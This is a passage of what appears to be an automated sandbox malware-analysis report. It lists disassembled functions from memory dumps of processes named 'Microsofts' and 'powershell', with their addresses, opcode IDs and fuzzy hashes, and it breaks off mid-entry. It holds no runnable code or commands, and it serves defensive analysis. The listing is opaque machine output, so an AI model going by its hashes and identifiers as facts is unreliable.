                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cf01ee1c11921ed9ec477828a1d81f048fa0d11d998cbe1ea2f8542d3a20e834
                                                                                                                                      • Instruction ID: 6d181f8cea159809364fd81e3f9ea641be7c26f80efe2e49234ce669a62db19c
                                                                                                                                      • Opcode Fuzzy Hash: cf01ee1c11921ed9ec477828a1d81f048fa0d11d998cbe1ea2f8542d3a20e834
                                                                                                                                      • Instruction Fuzzy Hash: F1F02D357083444FCB152774581847E7F96EBC6320715409BE54ACB3A2DE798C12D751
                                                                                                                                      Function 00BBC1B0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b69c2fc2e788b98f26920a83e8a87e1bd6d97655aa64ea3204077a1795a68aeb
                                                                                                                                      • Instruction ID: 6a246d6c94214a3c896d02f6b82243cae9a912758ecc099c7d4fa9b9dc4775cd
                                                                                                                                      • Opcode Fuzzy Hash: b69c2fc2e788b98f26920a83e8a87e1bd6d97655aa64ea3204077a1795a68aeb
                                                                                                                                      • Instruction Fuzzy Hash: 6FF0A7327005155BCB19966EE4149AEBBE9EFC573171440BBF509EB351CFB1DC028790
                                                                                                                                      Function 00BBB9E9 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: da34b401d8ec63c0cbfacccd062268b9142730599ac0299a967db611c1ecaf81
                                                                                                                                      • Instruction ID: f5033c22c1c8f6e3c1fb1de73a00eecd33f815ae501d411759dd6275265260f1
                                                                                                                                      • Opcode Fuzzy Hash: da34b401d8ec63c0cbfacccd062268b9142730599ac0299a967db611c1ecaf81
                                                                                                                                      • Instruction Fuzzy Hash: E9F02472A001099FCB50DFBD98809EFBBF1FB88350B00463AD205D3601E7B096038BA0
                                                                                                                                      Function 00BBB9F8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 097a6b78381e9ef6b55af74d416fd02f50d75040d0d43cc378aae96e64f3eb91
                                                                                                                                      • Instruction ID: 40aea7ef77eda4ec37fa61f2867aac9c598764176475b3580c8a99a90b5267ec
                                                                                                                                      • Opcode Fuzzy Hash: 097a6b78381e9ef6b55af74d416fd02f50d75040d0d43cc378aae96e64f3eb91
                                                                                                                                      • Instruction Fuzzy Hash: 63F08271A002089F8B50DFAD98409EFBBF5FB88350B10452AD609D3201E7709A118BE1
                                                                                                                                      Function 00BB46C9 Relevance: .0, Instructions: 28COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4744504d43b1e9b08bd19c8e88a30436bd6a657a9ae941d6f6c105f5a4c8ab95
                                                                                                                                      • Instruction ID: 8f13a1123200bd8d14bba090ea2bb2606b65b8f4f3b46263480fc4fdb0659703
                                                                                                                                      • Opcode Fuzzy Hash: 4744504d43b1e9b08bd19c8e88a30436bd6a657a9ae941d6f6c105f5a4c8ab95
                                                                                                                                      • Instruction Fuzzy Hash: 99F0C271865B928FD711ABB0ACBC2AEBB71FF0B317B492D45E40A92432DB702456CF14
                                                                                                                                      Function 00BB46D8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0d9d082e60c604842200a1aa9edb80b4f35a84f06765fda4a7e7248d0f5c52bb
                                                                                                                                      • Instruction ID: 545b9222fc2924b2e7f1ab26101967adc7ae607a969a30f8546c78ffb9dcc08b
                                                                                                                                      • Opcode Fuzzy Hash: 0d9d082e60c604842200a1aa9edb80b4f35a84f06765fda4a7e7248d0f5c52bb
                                                                                                                                      • Instruction Fuzzy Hash: 02E00275861B468BE610ABB0ADBC67E7B65FB0B327B842D40A01E81432AF705446CE55
                                                                                                                                      Function 00BB1877 Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f3c1632e6e8e5490016ebcde53a1e68fedce1c124570030d69f7afdb4c7438ab
                                                                                                                                      • Instruction ID: c0ab671cbb6fda78e29d8f471cef1ecb7d1f516a73abdfc0fdff48a0e4af3afd
                                                                                                                                      • Opcode Fuzzy Hash: f3c1632e6e8e5490016ebcde53a1e68fedce1c124570030d69f7afdb4c7438ab
                                                                                                                                      • Instruction Fuzzy Hash: CAE07D3BD202675BCB11DBB0FC006EEB730AFE1220F564226D81933140F770154ECAA0
                                                                                                                                      Function 00BB1888 Relevance: .0, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b48508cd4763d4417c6939cc05c0b1475b4aa37739415f057ea708f8cb4ca880
                                                                                                                                      • Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
                                                                                                                                      • Opcode Fuzzy Hash: b48508cd4763d4417c6939cc05c0b1475b4aa37739415f057ea708f8cb4ca880
                                                                                                                                      • Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0
                                                                                                                                      Function 00BBBCD8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 580c51bbea2488c4f8666e598297a357183c0589ae9bd63984ce8ac3637a9dc8
                                                                                                                                      • Instruction ID: a09908c3fd26e8fa82942b3767140e254b83552f5f5457143dabd42cce182767
                                                                                                                                      • Opcode Fuzzy Hash: 580c51bbea2488c4f8666e598297a357183c0589ae9bd63984ce8ac3637a9dc8
                                                                                                                                      • Instruction Fuzzy Hash: F8D02B6210828547CB057B605A01A7A3F114B03102F4603DE98488F863D761441D8341
                                                                                                                                      Function 00BB4831 Relevance: .0, Instructions: 7COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 17d9cd600fbbe0725593d3f63b9c222f97258eb3cd50c93f1a3b52d65f689dec
                                                                                                                                      • Instruction ID: caae83fb84780e34ab0381aa00aeef843496f79f040202c8601f61e162e50f5d
                                                                                                                                      • Opcode Fuzzy Hash: 17d9cd600fbbe0725593d3f63b9c222f97258eb3cd50c93f1a3b52d65f689dec
                                                                                                                                      • Instruction Fuzzy Hash: 52B092CB80DEC45FD32602241921084AFA1A862200B8A04DFC48091243F60816068306

                                                                                                                                      Executed Functions

                                                                                                                                      Function 007EB490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: {Y{r^$Y{r^
                                                                                                                                      • API String ID: 0-2785191563
                                                                                                                                      • Opcode ID: 08ca1cf9b97fcf5720bee270c89a1d3897df10310ed3d95514031ac98f156dc6
                                                                                                                                      • Instruction ID: 98847c769b3b8b0acc03e951de68b25654407b9d5f46719e98f83d813952aaaf
                                                                                                                                      • Opcode Fuzzy Hash: 08ca1cf9b97fcf5720bee270c89a1d3897df10310ed3d95514031ac98f156dc6
                                                                                                                                      • Instruction Fuzzy Hash: F5917171F016559BDB29EFB588116AE7BE3EF84700B40C92DD10AAB340EF746E058BD5
                                                                                                                                      Function 007EDC88 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +/{r^
                                                                                                                                      • API String ID: 0-3364197901
                                                                                                                                      • Opcode ID: e3e75645b8241dc8a2169505869e78b39a256c0ee5f3a20e562f662708c14290
                                                                                                                                      • Instruction ID: 8c534d647d0fa44e6b1956ad45b240b56b8c0d0917757aac2097af71c1bc94c3
                                                                                                                                      • Opcode Fuzzy Hash: e3e75645b8241dc8a2169505869e78b39a256c0ee5f3a20e562f662708c14290
                                                                                                                                      • Instruction Fuzzy Hash: 72E0923270565057C729926EF8119AF7B9FCFC9275711442EE1198B341DE5C9C0187F5
                                                                                                                                      Function 007EDC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +/{r^
                                                                                                                                      • API String ID: 0-3364197901
                                                                                                                                      • Opcode ID: e17cc797150ad9c212c072b0c08c875f4744a302aa604ae7db39d8376a930a10
                                                                                                                                      • Instruction ID: 1ee834e053c51974daf649b86334a622256794261176ae94b66fa93ed33c6eec
                                                                                                                                      • Opcode Fuzzy Hash: e17cc797150ad9c212c072b0c08c875f4744a302aa604ae7db39d8376a930a10
                                                                                                                                      • Instruction Fuzzy Hash: 2CE0C231700A11578225A76EB81089F77EBDEC9771320443EE119CB300DE6CDD0187E5
                                                                                                                                      Function 06F73CE8 Relevance: .5, Instructions: 520COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 306cd5a2e56fe3c6263b18c76beb9cfb91cfa8ef5a80481b8c01bc13173da3d2
                                                                                                                                      • Instruction ID: ef6041515f55fdc9e900e1b6286c6f290ea82e742912a6820441f082d4a49a44
                                                                                                                                      • Opcode Fuzzy Hash: 306cd5a2e56fe3c6263b18c76beb9cfb91cfa8ef5a80481b8c01bc13173da3d2
                                                                                                                                      • Instruction Fuzzy Hash: 90022572F00205DFD7699B689811BABBBF29F92210F2480BBD545CB291DF35DC51C7A2
                                                                                                                                      Function 06F72700 Relevance: .3, Instructions: 330COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9fe4b04e00c21f2af93d80b16d604d3c71b2728ddefd645c9acf355827e43aa0
                                                                                                                                      • Instruction ID: f5cc73dd5bb44f402ebecdd5c2b26def11f13e5f9fa8e17d2217e8c519b9b7f3
                                                                                                                                      • Opcode Fuzzy Hash: 9fe4b04e00c21f2af93d80b16d604d3c71b2728ddefd645c9acf355827e43aa0
                                                                                                                                      • Instruction Fuzzy Hash: E4B11932F00205DFE7659F68C8517AABBF2AF89211F14807BD505DB292DB35DE41C7A1
                                                                                                                                      Function 007E29F0 Relevance: .2, Instructions: 208COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f04d9bf263fa5d30fa45054ecea0ba3500021af34a4dc5a338fe3dd7ad5dc344
                                                                                                                                      • Instruction ID: 620280bcf89b09037e93ecb8d7280175ebbae0b081f536a7ab26cda8f006a4de
                                                                                                                                      • Opcode Fuzzy Hash: f04d9bf263fa5d30fa45054ecea0ba3500021af34a4dc5a338fe3dd7ad5dc344
                                                                                                                                      • Instruction Fuzzy Hash: 9891CF70A01245CFCB15CF59C484AAEFBB5FF88310B248669D915AB366D739FC52CBA0
                                                                                                                                      Function 007EAC1F Relevance: .2, Instructions: 158COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1a51a0348e7c8714bf9af1cc8979e29739854ee6c9c618e5ecb7302a816d9c72
                                                                                                                                      • Instruction ID: ee19e4b04bc8789a59d370c3dad36dd5d22af7fa57b05de5fe0886c45f8ef48d
                                                                                                                                      • Opcode Fuzzy Hash: 1a51a0348e7c8714bf9af1cc8979e29739854ee6c9c618e5ecb7302a816d9c72
                                                                                                                                      • Instruction Fuzzy Hash: 4C5129B0A092C49FEB01DB68D855BEE7BB2EF85300F1540BAD104DF297DA3D6D018BA1
                                                                                                                                      Function 007EBAC0 Relevance: .2, Instructions: 155COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ea84ab192fbda4289765839e54a5236e7bf0b6a0a6ba09a7934bb6453f8259d
                                                                                                                                      • Instruction ID: 4f077b2888064b3087a2a3875fd4dc69bad5ab415f64cd7fa7e57c8d43e8df7c
                                                                                                                                      • Opcode Fuzzy Hash: 7ea84ab192fbda4289765839e54a5236e7bf0b6a0a6ba09a7934bb6453f8259d
                                                                                                                                      • Instruction Fuzzy Hash: DB6128B1E01248DFDB54DFA9D484A9DBBF1EF88310F248129E809AB365EB349D41CB60
                                                                                                                                      Function 007EBAB0 Relevance: .2, Instructions: 150COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a8638c033094109e54419488ce5359652c3f4ab079e9ff87bcbf61bb1c8af813
                                                                                                                                      • Instruction ID: 18bd42d7d361da57ec8042865657d031439a0d00474b5bd397b05b91f1616fb0
                                                                                                                                      • Opcode Fuzzy Hash: a8638c033094109e54419488ce5359652c3f4ab079e9ff87bcbf61bb1c8af813
                                                                                                                                      • Instruction Fuzzy Hash: 49513971E01248DFDB54DFA9D484A9EBFF1EF88310F248069E909AB365DB349D45CB60
                                                                                                                                      Function 007E6FE0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bb6f7bb9c67d4d65598f1a505474c3172da0b2cdc62af969068924c9118dbaa4
                                                                                                                                      • Instruction ID: ddf9c027417d21c60a925c2341cbd9deedac46050973340c0e47b018e4882e2a
                                                                                                                                      • Opcode Fuzzy Hash: bb6f7bb9c67d4d65598f1a505474c3172da0b2cdc62af969068924c9118dbaa4
                                                                                                                                      • Instruction Fuzzy Hash: 5C414D74B052448FDB19CB69C468AAEBBF2EF8D310F148058E406EB391DB359C01CB60
                                                                                                                                      Function 06F73CE7 Relevance: .1, Instructions: 110COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5680afa7eae90c6da6ac040d0423cff54c59ec7c41a03647f5b903b3ea63ff82
                                                                                                                                      • Instruction ID: 30e6535fb0f4d2ce95905f11f8941e8f773d73110e8c21c2ace26fac83694d25
                                                                                                                                      • Opcode Fuzzy Hash: 5680afa7eae90c6da6ac040d0423cff54c59ec7c41a03647f5b903b3ea63ff82
                                                                                                                                      • Instruction Fuzzy Hash: 51311273E00209EFDBA88F248541FBBB7A3AF80640F24806AD9059F251DB35ED45D7B6
                                                                                                                                      Function 007E2B00 Relevance: .1, Instructions: 107COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e7fc3bbe632704aae6a926be9511fddf8a8875700f86a880cc23cfcfbd58ff11
                                                                                                                                      • Instruction ID: e585a274c926dbd123b36bc257fbd664f28dc36366ba17b2830ca486b3d16e41
                                                                                                                                      • Opcode Fuzzy Hash: e7fc3bbe632704aae6a926be9511fddf8a8875700f86a880cc23cfcfbd58ff11
                                                                                                                                      • Instruction Fuzzy Hash: 51416AB0A01105CFCB05CF59C1989AEFBB5FF48310B258269C915AB365D73AFC52CBA0
                                                                                                                                      Function 007EC388 Relevance: .1, Instructions: 101COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d27b445cf1f31a1c525786ac1f1a52348c2db376c42c5ffe2848259dd71a538d
                                                                                                                                      • Instruction ID: 1aa1fca90cc93bc122679c9f99ddcce8b65d33fec11ffcb7ce23d5f130f7435e
                                                                                                                                      • Opcode Fuzzy Hash: d27b445cf1f31a1c525786ac1f1a52348c2db376c42c5ffe2848259dd71a538d
                                                                                                                                      • Instruction Fuzzy Hash: F2319C353002019FD709EB79E854B9AB7A6EFC9314F108129E609CB391DF74A905CB91
                                                                                                                                      Function 007E7740 Relevance: .1, Instructions: 89COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 69fdefeda69ba2c594d9eb7806e7ab81d3e398eb1a259faebb217f9848b6d16d
                                                                                                                                      • Instruction ID: a42538a03307b9cfc86c569355f3a13dd4243efd1f6273e26aaddf90550ca5e6
                                                                                                                                      • Opcode Fuzzy Hash: 69fdefeda69ba2c594d9eb7806e7ab81d3e398eb1a259faebb217f9848b6d16d
                                                                                                                                      • Instruction Fuzzy Hash: DE31A0307092859FD319DB76D858B2A77E6EB98315F258869D409CB352EB39EC01CB90
                                                                                                                                      Function 007EAE60 Relevance: .1, Instructions: 88COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a18b4447786bd7e3ee9ab75ca842cfe4f9210f7e7dfa2627e06658305054401
                                                                                                                                      • Instruction ID: 148ac9952599653c8a27a1d9838eff3b86de25451ed1c42bd692c7f915a4269b
                                                                                                                                      • Opcode Fuzzy Hash: 8a18b4447786bd7e3ee9ab75ca842cfe4f9210f7e7dfa2627e06658305054401
                                                                                                                                      • Instruction Fuzzy Hash: 10314F71E01249DFDB44DF6AD495BAE7BF6EF88310F148069E505EB350EB389C418B52
                                                                                                                                      Function 007EAE70 Relevance: .1, Instructions: 84COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9d6813470c3b9997852af2cb0d7b2164f6a8cc8e71b27f96415de76bdd581181
                                                                                                                                      • Instruction ID: 1d5f77f00f245d8ac0a31ca701d7a780d9608f3febf3ce344f445b631d926e83
                                                                                                                                      • Opcode Fuzzy Hash: 9d6813470c3b9997852af2cb0d7b2164f6a8cc8e71b27f96415de76bdd581181
                                                                                                                                      • Instruction Fuzzy Hash: E2315E70E01249AFDB44DF6AC4957AEBBF6AF88300F148069E405EB350EB389C018B92
                                                                                                                                      Function 007EAF98 Relevance: .1, Instructions: 82COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ebf194f902265020451a0e3dce63cbb275f747b80b1d803a45489f5fdd21fab2
                                                                                                                                      • Instruction ID: 4715f7cbb3bd912f052cf2b2ae28a698adaf93ae239c87dfe22fe40220bb9305
                                                                                                                                      • Opcode Fuzzy Hash: ebf194f902265020451a0e3dce63cbb275f747b80b1d803a45489f5fdd21fab2
                                                                                                                                      • Instruction Fuzzy Hash: 9A21AE75A042488FCB24DFAED45479FBFF5EB89320F14842AD118A7340CB79A905CBA5
                                                                                                                                      Function 007E93F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d2e5731827a00a896c3708fdd5fc9bcb3ca6a266d9ba0790aacbc2a86df4a3ce
                                                                                                                                      • Instruction ID: d7166f981f58370f3788cf6f986ce06165b95afb48156971932613cf80ce9763
